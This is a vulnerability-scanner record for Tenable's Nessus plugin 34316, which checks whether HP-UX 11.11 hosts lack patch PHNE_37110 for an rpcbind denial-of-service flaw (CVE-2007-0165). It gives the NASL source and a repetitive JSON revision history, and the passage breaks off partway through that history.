HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)
2008-10-01T00:00:00
ID HPUX_PHNE_37110.NASL Type nessus Reporter Tenable Modified 2018-07-12T00:00:00
Description
s700_800 11.11 ONC/NFS General Release/Performance Patch :
A potential security vulnerability has been identified with HP-UX
running rpcbind. The vulnerability could be remotely exploited to
create a Denial of Service (DoS) .
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and patch checks in this plugin were
# extracted from HP patch PHNE_37110. The text itself is
# copyright (C) Hewlett-Packard Development Company, L.P.
#
include("compat.inc");
if (description)
{
script_id(34316);
script_version("1.16");
script_cvs_date("Date: 2018/07/12 19:01:15");
script_cve_id("CVE-2007-0165");
script_bugtraq_id(21964);
script_xref(name:"HP", value:"emr_na-c01556916");
script_xref(name:"HP", value:"HPSBUX02370");
script_xref(name:"HP", value:"SSRT071459");
script_name(english:"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)");
script_summary(english:"Checks for the patch in the swlist output");
script_set_attribute(
attribute:"synopsis",
value:"The remote HP-UX host is missing a security-related patch."
);
script_set_attribute(
attribute:"description",
value:
"s700_800 11.11 ONC/NFS General Release/Performance Patch :
A potential security vulnerability has been identified with HP-UX
running rpcbind. The vulnerability could be remotely exploited to
create a Denial of Service (DoS) ."
);
# http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?338fde17"
);
script_set_attribute(
attribute:"solution",
value:"Install patch PHNE_37110 or subsequent."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/o:hp:hp-ux");
script_set_attribute(attribute:"patch_publication_date", value:"2008/09/22");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/01");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");
script_family(english:"HP-UX Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/HP-UX/version", "Host/HP-UX/swlist");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("hpux.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/HP-UX/version")) audit(AUDIT_OS_NOT, "HP-UX");
if (!get_kb_item("Host/HP-UX/swlist")) audit(AUDIT_PACKAGE_LIST_MISSING);
if (!hpux_check_ctx(ctx:"11.11"))
{
exit(0, "The host is not affected since PHNE_37110 applies to a different OS release.");
}
patches = make_list("PHNE_37110", "PHNE_37568", "PHNE_39167", "PHNE_41023", "PHNE_41973", "PHNE_43577");
foreach patch (patches)
{
if (hpux_installed(app:patch))
{
exit(0, "The host is not affected because patch "+patch+" is installed.");
}
}
flag = 0;
if (hpux_check_patch(app:"NFS.KEY-CORE", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-64ALIB", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-64SLIB", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-CLIENT", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-CORE", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-ENG-A-MAN", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-KRN", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-PRG", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-SERVER", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NFS-SHLIBS", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NIS-CLIENT", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NIS-CORE", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NIS-SERVER", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"NFS.NISPLUS-CORE", version:"B.11.11")) flag++;
if (hpux_check_patch(app:"OS-Core.CORE-ENG-A-MAN", version:"B.11.11")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "HPUX_PHNE_37110.NASL", "bulletinFamily": "scanner", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .", "published": "2008-10-01T00:00:00", "modified": "2018-07-12T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "reporter": "Tenable", "references": ["http://www.nessus.org/u?338fde17"], "cvelist": ["CVE-2007-0165"], "type": "nessus", "lastseen": "2019-01-16T20:08:36", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2007-0165"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX running rpcbind. The vulnerability could be remotely exploited to create a Denial of Service (DoS) .", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "a4b793e65e53f8ff9af7a4e3da2b176867566a4c0e1af8815e5e7c8cfb74c870", "hashmap": [{"hash": "7aa77d624cf2b9a84ca1c279d1032e90", "key": "title"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "60bc551ca678c042256508c5a0f46689", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "395c550ad1f388a6e1339458c69517e3", "key": "cvelist"}, {"hash": "68d317a66c0c547bc015c7bcb716d830", "key": "references"}, {"hash": "6336146e54671bcda780588839b91aed", "key": "href"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "e839baedc6b140e90f55ca5cb59453c6", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "a228636dbac0feaf7beb81daec024801", "key": "description"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "id": "HPUX_PHNE_37110.NASL", "lastseen": "2018-09-01T23:33:42", "modified": "2018-07-12T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "34316", "published": "2008-10-01T00:00:00", "references": ["http://www.nessus.org/u?338fde17"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34316);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 5, "lastseen": "2018-09-01T23:33:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2007-0165"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX running rpcbind. The vulnerability could be remotely exploited to create a Denial of Service (DoS) .", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "ffff8fc731526974987182425f003fd2f86f4af711ed914f29f2002ab0b1c10a", "hashmap": [{"hash": "7aa77d624cf2b9a84ca1c279d1032e90", "key": "title"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "60bc551ca678c042256508c5a0f46689", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "395c550ad1f388a6e1339458c69517e3", "key": "cvelist"}, {"hash": "68d317a66c0c547bc015c7bcb716d830", "key": "references"}, {"hash": "6336146e54671bcda780588839b91aed", "key": "href"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "e839baedc6b140e90f55ca5cb59453c6", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "a228636dbac0feaf7beb81daec024801", "key": "description"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "id": "HPUX_PHNE_37110.NASL", "lastseen": "2018-08-30T19:30:47", "modified": "2018-07-12T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "34316", "published": "2008-10-01T00:00:00", "references": ["http://www.nessus.org/u?338fde17"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34316);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:30:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-0165"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX running rpcbind. The vulnerability could be remotely exploited to create a Denial of Service (DoS) .", "edition": 1, "enchantments": {}, "hash": "f802bc66c663b0e9e820bb275ac4ffa1db2ce7eedf34bd9caa8925b7268e0917", "hashmap": [{"hash": "7aa77d624cf2b9a84ca1c279d1032e90", "key": "title"}, {"hash": "85b8a83a30aa02cc3e2d54ff1f6abd96", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "60bc551ca678c042256508c5a0f46689", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8a92e595513c803094077f6b08916ff2", "key": "sourceData"}, {"hash": "395c550ad1f388a6e1339458c69517e3", "key": "cvelist"}, {"hash": "68d317a66c0c547bc015c7bcb716d830", "key": "references"}, {"hash": "6336146e54671bcda780588839b91aed", "key": "href"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "a228636dbac0feaf7beb81daec024801", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "id": "HPUX_PHNE_37110.NASL", "lastseen": "2016-09-26T17:23:12", "modified": "2015-03-30T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.2", "pluginID": "34316", "published": "2008-10-01T00:00:00", "references": ["http://www.nessus.org/u?338fde17"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34316);\n script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2015/03/30 13:45:23 $\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_osvdb_id(48454);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2015 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:12"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2007-0165"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX running rpcbind. The vulnerability could be remotely exploited to create a Denial of Service (DoS) .", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "a4b793e65e53f8ff9af7a4e3da2b176867566a4c0e1af8815e5e7c8cfb74c870", "hashmap": [{"hash": "7aa77d624cf2b9a84ca1c279d1032e90", "key": "title"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "60bc551ca678c042256508c5a0f46689", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "395c550ad1f388a6e1339458c69517e3", "key": "cvelist"}, {"hash": "68d317a66c0c547bc015c7bcb716d830", "key": "references"}, {"hash": "6336146e54671bcda780588839b91aed", "key": "href"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "e839baedc6b140e90f55ca5cb59453c6", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "a228636dbac0feaf7beb81daec024801", "key": "description"}, {"hash": "f5e850f1985da305c7f9475708cd4d52", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "id": "HPUX_PHNE_37110.NASL", "lastseen": "2018-07-13T09:30:47", "modified": "2018-07-12T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "34316", "published": "2008-10-01T00:00:00", "references": ["http://www.nessus.org/u?338fde17"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n 